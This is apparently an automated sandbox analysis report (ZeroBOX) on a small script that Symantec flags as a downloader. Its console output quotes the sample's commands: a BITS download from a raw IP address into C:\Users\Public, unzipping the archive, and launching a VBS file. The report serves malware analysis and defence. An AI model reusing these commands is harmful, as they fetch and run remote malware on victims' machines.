Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 31, 2023, 9:37 a.m.	Oct. 31, 2023, 9:39 a.m.

Size	384.0B
Type	ASCII text, with CRLF line terminators
MD5	`234efa19ef4c4c09d112a8e3e77849ad`
SHA256	`e456a5b679f32da5f0e0d6ba31f5ce07853a686112617f89bf9e903d75ac710e`
CRC32	`62D1936D`
ssdeep	`6:j+q9NqhusnMVntSom5szRAuaHbr9J2snadEg9VRAuaHbrlpulRAuaH/HlJPIaHO3:KqahjnMVUom5sCD9JrnWEYVmD/0mzHlE`
Yara	Antivirus - Contains references to security software

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\n.txt.ps1
1932

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (34 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'Cr console_handle: 0x00000023	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: eateObject'. console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\n.txt.ps1:1 char:4 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + Set <<<< objShell = CreateObject("WScript.Shell") console_handle: 0x00000047	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x00000053	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: ndingException console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: .Commands.SetVariableCommand console_handle: 0x00000077	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: The term 'objShell.Run' is not recognized as the name of a cmdlet, function, sc console_handle: 0x00000097	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: ript file, or operable program. Check the spelling of the name, or if a path wa console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: s included, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\n.txt.ps1:3 char:13 console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + objShell.Run <<<< "powershell.exe Start-BitsTransfer -Source 'http://185.81. console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: 157.24:222/n.jpg' -Destination 'C:\Users\Public\ben.zip'", 0, True console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + CategoryInfo : ObjectNotFound: (objShell.Run:String) [], Comman console_handle: 0x000000df	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: dNotFoundException console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: The term 'objShell.Run' is not recognized as the name of a cmdlet, function, sc console_handle: 0x00000117	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: ript file, or operable program. Check the spelling of the name, or if a path wa console_handle: 0x00000123	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: s included, verify that the path is correct and try again. console_handle: 0x0000012f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\n.txt.ps1:7 char:13 console_handle: 0x0000013b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + objShell.Run <<<< "powershell.exe Expand-Archive -Path 'C:\Users\Public\ben. console_handle: 0x00000147	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: zip' -DestinationPath 'C:\Users\Public\' -Force", 0, True console_handle: 0x00000153	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + CategoryInfo : ObjectNotFound: (objShell.Run:String) [], Comman console_handle: 0x0000015f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: dNotFoundException console_handle: 0x0000016b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000177	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: The term 'objShell.Run' is not recognized as the name of a cmdlet, function, sc console_handle: 0x00000023	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: ript file, or operable program. Check the spelling of the name, or if a path wa console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: s included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\n.txt.ps1:10 char:13 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + objShell.Run <<<< "C:\Users\Public\Webcentral.vbs", 1, False console_handle: 0x00000053	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + CategoryInfo : ObjectNotFound: (objShell.Run:String) [], Comman console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: dNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 31, 2023, 9:37 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 31, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04d10c28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 31, 2023, 9:37 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x054f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05551000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05553000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05501000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05554000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 31, 2023, 9:37 a.m.	process_identifier: 1932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Symantec

ISB.Downloader!gen190

n.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All